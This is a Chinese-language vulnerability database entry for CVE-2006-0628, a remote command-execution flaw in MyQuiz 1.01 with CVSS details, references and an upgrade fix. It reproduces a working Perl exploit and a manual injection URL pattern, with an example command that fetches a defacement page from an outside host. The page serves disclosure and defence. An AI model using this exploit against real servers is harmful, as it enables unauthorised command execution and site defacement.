CVE-2006-0628
CVSS7.5
发布时间 :2006-02-10 06:02:00
修订时间 :2011-03-07 21:30:28
NMCOE    

[原文]myquiz.pl in Dale Ray MyQuiz 1.01 allows remote attackers to execute arbitrary commands via shell metacharacters in the URL, which are not properly handled as part of the PATH_INFO environment variable.


[CNNVD]Dale Ray MyQuiz myquiz.pl 任意代码执行漏洞(CNNVD-200602-134)

        Dale Ray MyQuiz 1.01中的myquiz.pl存在任意代码执行漏洞,远程攻击者可以借助URL中的shell元字符(没有作为PATH_INFO环境变量的一部分正确处理)执行任意命令。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0628
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-0628
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200602-134
(官方数据源) CNNVD

- 其它链接及资源

http://www.evuln.com/vulns/57/summary.html
(VENDOR_ADVISORY)  MISC  http://www.evuln.com/vulns/57/summary.html
http://www.corantodemo.net/coranto/viewnews.cgi?id=EpApAAAVkyirPGThSf&style=dldetails
(PATCH)  MISC  http://www.corantodemo.net/coranto/viewnews.cgi?id=EpApAAAVkyirPGThSf&style=dldetails
http://www.vupen.com/english/advisories/2006/0443
(UNKNOWN)  VUPEN  ADV-2006-0443
http://www.securityfocus.com/archive/1/archive/1/423921/100/0/threaded
(VENDOR_ADVISORY)  BUGTRAQ  20060203 [eVuln] MyQuiz Arbitrary Command Execution Vulnerability
http://xforce.iss.net/xforce/xfdb/24501
(UNKNOWN)  XF  myquiz-pathinfo-command-execution(24501)
http://www.securityfocus.com/archive/1/archive/1/424266/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060207 MyQuiz Arbitrary Command Execution Exploit (perl)
http://www.osvdb.org/22925
(UNKNOWN)  OSVDB  22925
http://securityreason.com/securityalert/409
(UNKNOWN)  SREASON  409
http://secunia.com/advisories/18737
(UNKNOWN)  SECUNIA  18737
http://attrition.org/pipermail/vim/2006-February/000537.html
(UNKNOWN)  VIM  20060209 Vendor ACK for MyQuiz

- 漏洞信息

Dale Ray MyQuiz myquiz.pl 任意代码执行漏洞
高危 未知
2006-02-10 00:00:00 2006-02-10 00:00:00
远程  
        Dale Ray MyQuiz 1.01中的myquiz.pl存在任意代码执行漏洞,远程攻击者可以借助URL中的shell元字符(没有作为PATH_INFO环境变量的一部分正确处理)执行任意命令。

- 公告与补丁

        

- 漏洞信息 (1471)

MyQuiz 1.01 (PATH_INFO) Arbitrary Command Execution Exploit (EDBID:1471)
cgi webapps
2006-02-06 Verified
0 Hessam-x
N/A [点击下载]
#!/usr/bin/perl
# => MyQuiz Remote Command Execution Exploit
# -> By Hessam-x  / www.hackerz.ir
# manual exploiting --> http://[target]/cgi-bin/myquiz.pl/ask/;<Command>|
# SecurityFocus [bug] : http://www.securityfocus.com/archive/1/423921/30/0/threaded
# /   |   \_____    ____ |  | __ ___________________
#/    ~    \__  \ _/ ___\|  |/ // __ \_  __ \___   /
#\    Y    // __ \\  \___|    <\  ___/|  | \//    /
# \___|_  /(____  /\___  >__|_ \\___  >__|  /_____ \
#       \/      \/     \/     \/    \/            \/
# Iran Hackerz Security Team
# Hessam-x : www.hessamx.net

use LWP::Simple;

print "-------------------------------------------\n";
print "= MyQuiz Remote Command Execution Exploit =\n";
print "=       By Hessam-x  - www.hackerz.ir     =\n";
print "-------------------------------------------\n\n";


       print "Target(www.example.com)\> ";
       chomp($targ = <STDIN>);

       print "path: (/cgi-bin/myquiz.pl/ask/)\>";
       chomp($path=<STDIN>);

       print "command: (wget www.hackerz.ir/deface.htm)\>";
       chomp($comd=<STDIN>);


$page=get("http://".$targ.$path) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $targ\n";
print "[~] Sending exploiting request,wait....\n";
get("http://".$targ.$path.";".$comd."|")
print "[+] Exploiting request done!\n";
print "Enjoy !";

# milw0rm.com [2006-02-06]
		

- 漏洞信息

22925
MyQuiz myquiz.pl $ENV{'PATH_INFO'} Arbitrary Command Execution
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

MyQuiz contains a flaw that may allow a malicious user to execute arbitray commands. The issue is triggered when an attacker calls the myquiz.pl script, but appends arbitrary commands via the pipe (|) symbol.

- 时间线

2006-02-03 Unknow
2006-02-03 Unknow

- 解决方案

Upgrade to version 2.0 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站